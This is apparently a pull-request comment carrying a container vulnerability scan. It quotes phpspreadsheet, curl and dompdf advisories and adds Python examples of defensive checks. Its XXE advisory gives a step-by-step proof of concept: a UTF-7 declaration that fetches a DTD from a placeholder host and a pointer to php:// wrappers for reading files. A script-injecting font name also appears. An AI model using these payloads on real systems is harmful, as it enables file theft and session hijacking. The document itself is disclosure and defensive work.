Try catches added #111
Conversation
👋 @bbrands02
🔍 Vulnerabilities of

| digest | sha256:3b72d86ec8e0c4aabf7dfd120821bcd695d2459a5a38951c8f4dc881ec759b04 |
| vulnerabilities | |
| size | 255 MB |
| packages | 316 |

📦 Base Image php:8.2-fpm-alpine

| also known as | |
| digest | sha256:f445071227e858c52d0aab62372ad4a7b4f939584fd8df3ef04071f953571f1e |
| vulnerabilities | |
phpoffice/phpspreadsheet

| Affected range | <2.2.1 |
| Fixed version | 2.2.1 |
| CVSS Score | 8.8 |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| EPSS Score | 0.00043 |
| EPSS Percentile | 0.09559 |
Description

Summary

Bypassing the filter allows an XXE attack, which in turn allows an attacker to obtain the contents of local files, even if error reporting is muted by the @ symbol (LFI attack).

Details

The check

```php
$pattern = '/encoding="(.*?)"/';
```

is easy to bypass: just use a single quote symbol `'`. So the payload looks like this:

```xml
<?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>
```

If you add this header to any XML file inside an xlsx-formatted file, such as the sharedStrings.xml file, then the XXE will execute.
PoC

- Create a simple xlsx file.
- Rename the xlsx to zip.
- Go into the zip and open the `xl/sharedStrings.xml` file in edit mode.
- Replace

  ```xml
  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
  ```

  with

  ```xml
  <?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]>
  ```

- Save the `sharedStrings.xml` file and rename the zip back to xlsx.
- Use minimal PHP code that simply opens this xlsx file:

  ```php
  <?php
  use PhpOffice\PhpSpreadsheet\IOFactory;

  require __DIR__ . '/vendor/autoload.php';

  // Loading the workbook is enough: the reader parses sharedStrings.xml
  $spreadsheet = IOFactory::load("file.xlsx");
  ```

- You will receive the request to your `http://%webhook%/file.dtd`.
- Don't forget that you can use PHP wrappers in the XXE; some php:// wrapper payloads allow fetching local files.
Impact

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

| Affected range | <2.1.0 |
| Fixed version | 2.1.0 |
| CVSS Score | 5.4 |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |
| EPSS Score | 0.00045 |
| EPSS Percentile | 0.16332 |
Description

Summary

`\PhpOffice\PhpSpreadsheet\Writer\Html` doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.

PoC

Example target script:

```php
<?php
require 'vendor/autoload.php';

// Read the crafted workbook and render it as HTML, as a viewer page would
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader->load(__DIR__ . '/book.xlsx');
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer->generateHTMLAll());
```

Save this file in the same directory: book.xlsx

Open index.php in a web browser. An alert should be displayed.

Impact

Full takeover of the session of users viewing spreadsheet files as HTML.
curl 8.9.0-r0 (apk)
pkg:apk/alpine/curl@8.9.0-r0?os_name=alpine&os_version=3.20

| Affected range | <8.9.1-r0 |
| Fixed version | 8.9.1-r0 |
| EPSS Score | 0.00056 |
| EPSS Percentile | 0.23801 |

Description
dompdf/dompdf 2.0.4 (composer)
pkg:composer/dompdf/dompdf@2.0.4

OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

| Affected range | <=2.0.4 |
| Fixed version | Not Fixed |

Description

Improper Neutralization in dompdf/dompdf.

No description provided.
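The encoding check quoted in the first phpspreadsheet advisory above, as an added example in Python (not PhpSpreadsheet's own code, and not its actual fix): the advisory's double-quote-only pattern sits beside a hardened check that accepts either quote style and decodes the whole part with the declared encoding before looking for a DTD, so the `+ADw-` UTF-7 shift sequence becomes the `<` the XML parser will see. `POC_UTF7`, `DQ_UTF7`, `BENIGN`, the hardened regex and the `contains_dtd` helper are constructed here for illustration.

```python
import codecs
import re

# Constructed inputs. POC_UTF7 is the declaration from the advisory's PoC with a
# placeholder host; DQ_UTF7 is the same trick with double quotes, which the weak
# pattern does catch; BENIGN is an ordinary sharedStrings.xml header.
POC_UTF7 = (
    "<?xml version=\"1.0\" encoding='UTF-7' standalone=\"yes\"?> "
    "+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM \"http://example.com/file.dtd\"> %xxe;]>"
)
DQ_UTF7 = POC_UTF7.replace("encoding='UTF-7'", 'encoding="UTF-7"')
BENIGN = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?><sst count="1"/>'

DTD_MARKER = re.compile(r"<!(DOCTYPE|ENTITY)", re.IGNORECASE)


def weak_declared_encoding(head: str) -> str:
    """The pattern quoted in the advisory: only a double-quoted encoding attribute is seen."""
    m = re.search(r'encoding="(.*?)"', head)
    return m.group(1) if m else "UTF-8"


def hardened_declared_encoding(head: str) -> str:
    """Hypothetical replacement: either quote style, limited to the <?xml ...?> declaration."""
    m = re.search(r'<\?xml\b[^>]*?\bencoding\s*=\s*(["\'])([^"\']+)\1', head, re.IGNORECASE)
    return m.group(2) if m else "UTF-8"


def contains_dtd(raw: bytes, declared_encoding) -> bool:
    """True when the part, read the way the XML parser will read it, carries a DTD.

    The declaration is ASCII in every ASCII-compatible encoding, so it is located on
    a latin-1 view of the first KiB; the whole part is then decoded with the declared
    encoding so that UTF-7 shift sequences such as +ADw- become a literal '<'.
    """
    head = raw[:1024].decode("latin-1")
    enc = declared_encoding(head)
    try:
        codecs.lookup(enc)
        text = raw.decode(enc)
    except (LookupError, UnicodeDecodeError):
        return True  # unknown or undecodable encoding: reject rather than guess
    return DTD_MARKER.search(text) is not None


def demo() -> dict:
    """Verdict of each check on each constructed sample."""
    samples = {"poc_single_quote": POC_UTF7, "poc_double_quote": DQ_UTF7, "benign": BENIGN}
    return {
        name: {
            "weak": contains_dtd(xml.encode("ascii"), weak_declared_encoding),
            "hardened": contains_dtd(xml.encode("ascii"), hardened_declared_encoding),
        }
        for name, xml in samples.items()
    }


if __name__ == "__main__":
    for name, verdicts in demo().items():
        print(f"{name:18} weak={verdicts['weak']!s:5} hardened={verdicts['hardened']}")
```

The single-quoted PoC passes the weak check because the decision is taken on the raw bytes, where no `<!DOCTYPE` is visible, while the hardened check decides on the decoded text. The same idea applies to every OOXML part a reader unzips, not only sharedStrings.xml; a part that carries a UTF-16 BOM with no ASCII declaration needs its own detection step, which this example does not attempt.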
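The unsanitized font-name problem from the second phpspreadsheet advisory, as an added example in Python (a stand-in for how an HTML writer might emit cell styling; not `Writer\Html` or its fix): an attacker-controlled font name is interpolated into a `style` attribute, where one double quote ends the attribute and the remainder becomes markup, next to a version that allow-lists the font name and entity-escapes both attribute and cell text. `EVIL_FONT`, `FONT_NAME_RE` and the helper names are constructed here for illustration.

```python
import html
import re

# Constructed font name, illustrative only (not the advisory's book.xlsx): the double
# quote closes the style attribute, and everything after it is injected markup.
EVIL_FONT = 'Arial"><script>alert(1)</script><td x="'

# Characters that occur in real font family names; anything else is not a font name.
FONT_NAME_RE = re.compile(r"[A-Za-z0-9 ._-]{1,64}")


def cell_html_unsafe(value: str, font_name: str) -> str:
    """Interpolates the workbook's font name straight into a style attribute."""
    return f'<td style="font-family:\'{font_name}\'">{value}</td>'


def cell_html_safe(value: str, font_name: str, fallback: str = "Calibri") -> str:
    """Allow-lists the font name and entity-escapes both attribute and text.

    quote=True is what turns a stray double quote into &quot; so it cannot end
    the attribute; the allow-list is the real defence, since no legitimate font
    name contains '<', '>' or quotes in the first place.
    """
    if not FONT_NAME_RE.fullmatch(font_name):
        font_name = fallback
    return (
        f'<td style="font-family:\'{html.escape(font_name, quote=True)}\'">'
        f"{html.escape(value, quote=True)}</td>"
    )


def has_injected_markup(fragment: str) -> bool:
    """True when the fragment opens more than the single <td> we meant to emit."""
    return len(re.findall(r"<[A-Za-z]", fragment)) != 1


if __name__ == "__main__":
    print(cell_html_unsafe("42", EVIL_FONT))
    print(cell_html_safe("42", EVIL_FONT))
```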